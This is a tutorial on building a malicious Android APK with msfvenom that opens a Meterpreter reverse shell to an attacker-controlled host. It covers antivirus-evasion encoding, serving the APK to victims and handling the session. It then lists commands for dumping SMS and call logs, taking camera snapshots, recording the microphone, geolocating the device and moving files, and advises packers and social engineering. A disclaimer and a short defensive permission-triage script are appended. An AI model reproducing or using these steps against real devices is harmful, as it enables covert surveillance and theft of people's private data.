Hacking Android Devices Using msfvenom and Metasploit – Complete Guide

Learn how to generate Android reverse shell payloads with msfvenom and use Meterpreter for remote access and post-exploitation.

This article is for educational and authorized penetration testing purposes only. Unauthorized access to systems or devices is illegal and unethical. Always ensure you have explicit permission before testing.

Introduction

Android, being the most widely used mobile OS, is a frequent target for penetration testing. This guide demonstrates how to craft and deliver a Meterpreter reverse shell payload for Android devices using msfvenom and Metasploit, with step-by-step instructions from payload creation to post-exploitation.

What is msfvenom?

msfvenom is a versatile tool for generating and encoding payloads in the Metasploit Framework. It allows users to create custom malicious APKs that, once installed on a victim’s Android device, can establish a Meterpreter session to remotely control the system.

Step-by-Step: Exploiting an Android Device

Step 1: Generate the Payload

We’ll create a malicious APK that opens a reverse Meterpreter session when executed.

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.105 LPORT=4444 -o /root/Desktop/backdoor.apk

Explanation:

  • -p: Payload type.
  • android/meterpreter/reverse_tcp: Android-specific reverse shell.
  • LHOST: Attacker's IP address.
  • LPORT: Listening port.
  • -o: Output path and filename.

Step 2: Optional – Add Encoding for Evasion

Encoders can help evade antivirus or mobile security software.

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.105 LPORT=4444 \
-e x86/shikata_ga_nai -i 3 -o /root/Desktop/encoded_backdoor.apk

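Note: Encoders are limited for Android payloads; some may cause the APK to break. The x86/shikata_ga_nai encoder shown above is written for x86 shellcode, not for the Java/Dalvik code inside an APK. Always test in a lab environment.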

To list encoders:

msfvenom --list encoders

Step 3: Serve the APK

To distribute the payload (in a controlled test environment), host it using Apache or Python:

cp /root/Desktop/backdoor.apk /var/www/html/
service apache2 start

Or use Python’s HTTP server:

cd /root/Desktop/
python3 -m http.server 8080

The victim must manually install the APK, which usually requires enabling “Install from unknown sources.”

Step 4: Set Up the Listener with Metasploit

Now configure Metasploit to handle the incoming reverse shell.

msfconsole

Then:

use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.0.105
set LPORT 4444
exploit

Metasploit will wait for a connection. Once the APK is installed and launched on the victim's device, you'll get a Meterpreter session.

Step 5: Interact with the Android Device

When the connection is established, Metasploit will output:

[*] Sending stage (723456 bytes) to 192.168.0.112
[*] Meterpreter session 1 opened

To interact:

sessions
sessions -i 1

Meterpreter Post-Exploitation Commands for Android

Now you have control of the device. Here are some useful Meterpreter commands for Android:

System Info

sysinfo

Displays Android version, model, etc.

Check Current User

getuid

Returns the user context of the app.

Dump Call Logs

dump_calllog

Extracts call history.

Dump SMS

dump_sms

Retrieves text messages from the device.

Webcam Snapshot

webcam_snap

Takes a picture using the front camera.

Record Audio

record_mic

Records audio from the microphone.

Geolocation

geolocate

Gets GPS location (if enabled on the device).

File System Control

cd /sdcard/
ls
download somefile.txt
upload /root/test.txt /sdcard/

Navigate, upload, or download files.

App List

app_list

Lists installed apps.

Shell Access

shell

Gives a native Android shell.

Step 6: Exit or Kill Session

Exit the session:

exit

Or kill it:

sessions -k 1

Optional: Payload Formats and Advanced Options

You can also use other formats:

  • Java JAR: -f jar
  • Python: -f raw
  • PowerShell: for Windows delivery
  • WAR: Web application archive

View All Android Payloads

msfvenom --list payloads | grep android

Important Tips

  • Modern Android devices have built-in security that may block or warn against such APKs.
  • Use obfuscation, third-party packers, or droppers to improve success rate.
  • Physical access or strong social engineering is often required.
  • APKs generated with msfvenom do not look or behave like legitimate apps.
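
From the defender's side, each capability listed in the post-exploitation section (call log, SMS, camera, microphone, location) needs an Android permission, so an APK that requests most of them at once stands out. The added example below is not part of the original article or of Metasploit; it triages the text output of `aapt dump permissions`, and the capability-to-permission mapping, the threshold of 4 and the sample dumps are assumptions constructed for illustration.

```python
import re

# Assumed mapping (not from the article's tooling): each capability the article
# demonstrates, and the Android permission(s) an app must hold to use it.
CAPABILITY_PERMISSIONS = {
    "call log (dump_calllog)": {"READ_CALL_LOG"},
    "SMS (dump_sms)": {"READ_SMS"},
    "camera (webcam_snap)": {"CAMERA"},
    "microphone (record_mic)": {"RECORD_AUDIO"},
    "location (geolocate)": {"ACCESS_FINE_LOCATION", "ACCESS_COARSE_LOCATION"},
}

# Matches both aapt styles: "uses-permission: name='android.permission.X'"
# and the older "uses-permission: android.permission.X".
PERM_RE = re.compile(
    r"^uses-permission(?:-sdk-\d+)?:\s*(?:name=)?'?android\.permission\.([A-Z_]+)'?")

def requested_permissions(aapt_output):
    """Return the android.permission.* short names found in an aapt permissions dump."""
    perms = set()
    for line in aapt_output.splitlines():
        m = PERM_RE.match(line.strip())
        if m:
            perms.add(m.group(1))
    return perms

def triage(aapt_output, threshold=4):
    """Flag an APK whose permissions cover at least `threshold` of the capabilities."""
    perms = requested_permissions(aapt_output)
    covered = sorted(c for c, need in CAPABILITY_PERMISSIONS.items() if perms & need)
    return {"covered": covered, "flag": len(covered) >= threshold}

# Constructed sample dumps (not taken from a real APK).
SUSPECT = """package: com.example.flashlight
uses-permission: name='android.permission.INTERNET'
uses-permission: name='android.permission.READ_CALL_LOG'
uses-permission: name='android.permission.READ_SMS'
uses-permission: name='android.permission.CAMERA'
uses-permission: name='android.permission.RECORD_AUDIO'
uses-permission: name='android.permission.ACCESS_FINE_LOCATION'
"""
BENIGN = """package: com.example.notes
uses-permission: android.permission.INTERNET
uses-permission: name='android.permission.CAMERA'
"""

if __name__ == "__main__":
    for name, dump in (("suspect", SUSPECT), ("benign", BENIGN)):
        print(name, triage(dump))
```

A flag here is a prompt for manual review, not a verdict: legitimate apps such as messengers request several of these permissions too.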

Conclusion

This guide walks through the full process of generating and delivering an Android reverse shell payload using msfvenom and Metasploit. From basic payload creation to advanced Meterpreter interaction, the knowledge gained here is fundamental for Android penetration testing in lab environments.

Used responsibly, these skills can help security professionals identify weaknesses in mobile app ecosystems and build more secure applications.